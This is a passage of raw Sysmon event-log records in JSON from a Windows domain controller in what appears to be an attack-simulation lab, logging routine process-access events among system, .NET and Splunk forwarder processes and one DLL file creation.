C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:54.602","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6292,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:54.602\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0426-5F25-0000-00103E900B00}\r\nTargetProcessId: 4528\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:54.602","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0426-5F25-0000-00103E900B00}","TargetProcessId":"4528","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6293,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:54.711\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0426-5F25-0000-00102C920B00}\r\nTargetProcessId: 1328\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:54.711","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0426-5F25-0000-00102C920B00}","TargetProcessId":"1328","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6294,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:54.711\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0426-5F25-0000-00102C920B00}\r\nTargetProcessId: 1328\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:54.711","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0426-5F25-0000-00102C920B00}","TargetProcessId":"1328","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:56:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6295,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:54.711\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0426-5F25-0000-00102C920B00}\r\nTargetProcessId: 1328\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:54.711","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0426-5F25-0000-00102C920B00}","TargetProcessId":"1328","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6296,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:54.758\r\nSourceProcessGUID: {A837DB8D-0426-5F25-0000-00103E900B00}\r\nSourceProcessId: 4528\r\nSourceThreadId: 4936\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:54.758","SourceProcessGUID":"{A837DB8D-0426-5F25-0000-00103E900B00}","SourceProcessId":"4528","SourceThreadId":"4936","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6297,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:56:55.414\r\nProcessGuid: {A837DB8D-0426-5F25-0000-00102C920B00}\r\nProcessId: 1328\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\530-0\\System.Configuration.dll\r\nCreationUtcTime: 2020-08-01 05:56:55.414","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:56:55.414","ProcessGuid":"{A837DB8D-0426-5F25-0000-00102C920B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\530-0\\System.Configuration.dll","CreationUtcTime":"2020-08-01 05:56:55.414","EventReceivedTime":"2020-08-01 05:56:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6298,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:55.446\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-040E-5F25-0000-001064290B00}\r\nTargetProcessId: 4468\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:55.446","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-040E-5F25-0000-001064290B00}","TargetProcessId":"4468","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6299,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:55.446\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-040E-5F25-0000-001064290B00}\r\nTargetProcessId: 4468\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:55.446","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-040E-5F25-0000-001064290B00}","TargetProcessId":"4468","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:56:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6300,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:55.461\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0427-5F25-0000-00108D960B00}\r\nTargetProcessId: 4468\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 